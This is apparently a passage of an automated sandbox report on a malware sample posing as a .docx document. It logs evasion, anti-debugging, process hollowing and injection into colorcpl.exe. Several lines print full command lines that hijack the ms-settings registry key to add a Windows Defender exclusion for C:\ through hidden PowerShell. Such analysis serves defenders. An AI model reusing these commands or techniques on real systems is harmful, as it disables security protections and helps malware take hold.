Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299CD74

0_2_0299CD74

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458F7A7 Sleep,ExitProcess,

31_2_0458F7A7

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Opens the same file many times (likely Sandbox evasion)

Source: C:\Windows\SysWOW64\colorcpl.exe

File opened: \Device\RasAcd count: 191293

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\public\xkn.exe

Key value queried: Powershell behavior

Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\xkn.exe	Memory allocated: 1EC81490000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\Public\xkn.exe	Memory allocated: 1EC81490000 memory reserve \| memory write watch			Jump to behavior

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

31_2_0459A748

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Window / User API: threadDelayed 389	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 2191	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 974	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 1561
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 493
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 693
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: foregroundWindowGot 1697

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 6.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 6.4 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 9.9 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299CD74

0_2_0299CD74

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\drbdmeyP.pif TID: 1312	Thread sleep count: 389 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7316	Thread sleep count: 2191 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7316	Thread sleep count: 974 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8036	Thread sleep time: -42500s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040	Thread sleep time: -4683000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024	Thread sleep time: -493000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024	Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040	Thread sleep time: -2079000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029858B4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	8_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	8_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	8_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	12_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	12_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	12_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	12_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	12_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	14_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	14_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	14_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	14_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	17_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	17_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	17_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	17_2_00007FF64B5635B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589253
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	31_2_0459C291
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	31_2_0458C34D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	31_2_0458BD37
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CE879 FindFirstFileExA,	31_2_045CE879
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	31_2_0458880C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458783C FindFirstFileW,FindNextFileW,	31_2_0458783C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	31_2_04599AF5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	31_2_0458BB30

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

31_2_04587C97

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000864000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299D920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_0299D920

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugFlags	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B5863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

8_2_00007FF64B5863FC

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\ger.exe

24_2_00007FF7E0A0A29C

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02997CC8

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029DF3AD mov eax, dword ptr fs:[00000030h]	0_2_029DF3AD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045C32B5 mov eax, dword ptr fs:[00000030h]	31_2_045C32B5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06463F64 mov eax, dword ptr fs:[00000030h]	31_2_06463F64

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B56CD90 GetProcessHeap,RtlAllocateHeap,

8_2_00007FF64B56CD90

Enables debug privileges

Source: C:\Users\Public\xkn.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	3_2_004098D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004098F0 SetUnhandledExceptionFilter,	3_2_004098F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004099EC SetUnhandledExceptionFilter,	3_2_004099EC
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	3_1_004098D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004098F0 SetUnhandledExceptionFilter,	3_1_004098F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004099EC SetUnhandledExceptionFilter,	3_1_004099EC
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	8_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	10_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	12_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	14_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	17_2_00007FF64B5793B0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00007FF7E0A0ED50
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0F050 SetUnhandledExceptionFilter,	24_2_00007FF7E0A0F050
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_045B4FDC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_045B49F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B4B47 SetUnhandledExceptionFilter,	31_2_045B4B47
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_045BBB22

Source: C:\Users\Public\xkn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Users\Public\Libraries\drbdmeyP.pif base: 18160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6421617

Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Section unmapped: C:\Users\Public\Libraries\drbdmeyP.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory written: C:\Users\Public\Libraries\drbdmeyP.pif base: 3F8008			Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6420000			Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

31_2_045920F7

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04599627 mouse_event,

31_2_04599627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif	Jump to behavior
